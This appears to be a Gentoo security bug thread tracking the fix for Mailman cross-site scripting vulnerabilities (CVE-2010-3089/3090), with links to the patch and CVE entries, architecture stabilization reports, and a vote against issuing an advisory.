From $URL: > I plan to release a Mailman 2.1.14 candidate release towards the end of > next week (Sept 9 or 10). This release will have enhanced XSS defenses > addressing two recently discovered vulnerabilities. Since release of the > code will potentially expose the vulnerabilities, I plan to publish a > patch against the 2.1.13 base with the fix before actually releasing the > 2.1.14 candidate. Patch available at: http://mail.python.org/pipermail/mailman-announce/attachments/20100909/c9d893e6/attachment.txt
CVE assignment per http://www.openwall.com/lists/oss-security/2010/09/13/5: > There are two mailman vulns. fixed by the following patch: > http://mail.python.org/pipermail/mailman-announce/2010-September/000151.html > > Particular Red Hat Bugzilla entries are the following: > > https://bugzilla.redhat.com/show_bug.cgi?id=631881 CVE-2010-3089 mailman XSS via list information HTML template > https://bugzilla.redhat.com/show_bug.cgi?id=631859 CVE-2010-3090 mailman XSS in list information overview
I've committed 2.1.14_rc1 - I'm unsure if we want to have a rc version as stabilization-target, but I consider it not worth creating another .13-version (which has other issues as well).
CVE-2010-3090 will be rejected per: http://www.openwall.com/lists/oss-security/2010/09/13/12
CVE-2010-3089 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3089): Multiple cross-site scripting (XSS) vulnerabilities in GNU Mailman before 2.1.14rc1 allow remote authenticated users to inject arbitrary web script or HTML via vectors involving (1) the list information field or (2) the list description field.
Hi, Hanno. It looks like 2.1.14 has been released. http://bazaar.launchpad.net/~mailman-coders/mailman/2.1/annotate/head:/NEWS Is it an appropriate stabilization target?
mailman-2.1.14 in tree, please test and stabilize.
amd64 done
x86 stable
sparc stable
ppc done
Thanks, everyone. GLSA Vote: No. This is a stored/persistent XSS but only for authenticated mailing list owners according to https://bugzilla.redhat.com/show_bug.cgi?id=631881.
Agreed, closing noglsa.